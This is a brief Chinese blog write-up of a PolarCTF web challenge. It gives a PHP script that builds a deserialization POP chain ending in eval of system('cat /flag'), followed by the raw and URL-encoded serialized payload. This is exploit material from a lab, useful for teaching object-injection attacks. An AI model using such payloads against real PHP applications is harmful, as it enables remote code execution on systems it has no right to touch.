polarctfweb-easyRead

打开后直接看到一堆php代码,直接拷打ai
没什么好说的ai直接秒了
`<?php

class Read{
public $source;
public $is;

public function __toString() {
    return $this->is->run("Read");
}

public function __wakeup(){
    echo "Hello>>>".$this->source;
}

}

class Help{
public $source;
public $str;
public function Printf($what){
echo "Hello>>>".$what;
echo "
";
return $this->str->source;
}

public function __call($name, $arguments){
    $this->Printf($name);
}

}

class Polar {
private $var;
public function getit($value){
eval($value);
}
public function __invoke(){
$this->getit($this->var);
}
}

class Doit{
public $is;
private $source;
public function __construct(){
$this->is = array();
}

public function __get($key){
    $vul = $this->is;
    return $vul();
}

}

// ================== 构造 POP 链 ==================

// 创建对象
$R1 = new Read();
$R2 = new Read();
$H = new Help();
$D = new Doit();
$P = new Polar();

// 设置 Polar::$var 为想执行的代码:cat /flag
$ref = new ReflectionClass('Polar');
$prop = $ref->getProperty('var');
$prop->setAccessible(true);
$prop->setValue($P, "system('cat /flag');");

// 串联关系:Doit -> Polar
$D->is = $P;

// 串联关系:Help -> Doit
$H->str = $D;

// 串联关系:R2(Read) -> Help
$R2->is = $H;

// 顶层 R1(Read) 的 source 指向 R2
$R1->source = $R2;

// 生成 payload
$payload = serialize($R1);

echo "RAW:\n".$payload."\n\n";
echo "URLENCODE:\n".urlencode($payload)."\n";
expRAW:
O:4:"Read":2:{s:6:"source";O:4:"Read":2:{s:6:"source";N;s:2:"is";O:4:"Help":2:{s:6:"source";N;s:3:"str";O:4:"Doit":2:{s:2:"is";O:5:"Polar":1:{s:10:"Polarvar";s:20:"system('cat /flag');";}s:12:"Doitsource";N;}}}s:2:"is";N;}

URLENCODE:
O%3A4%3A%22Read%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Read%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A2%3A%22is%22%3BO%3A4%3A%22Help%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Doit%22%3A2%3A%7Bs%3A2%3A%22is%22%3BO%3A5%3A%22Polar%22%3A1%3A%7Bs%3A10%3A%22%00Polar%00var%22%3Bs%3A20%3A%22system%28%27cat+%2Fflag%27%29%3B%22%3B%7Ds%3A12%3A%22%00Doit%00source%22%3BN%3B%7D%7D%7Ds%3A2%3A%22is%22%3BN%3B%7D

`
image

得到flag,但是不知道为什么提交总是出错

posted @ 2025-12-08 21:01  CLAY666  阅读(2)  评论(0)    收藏  举报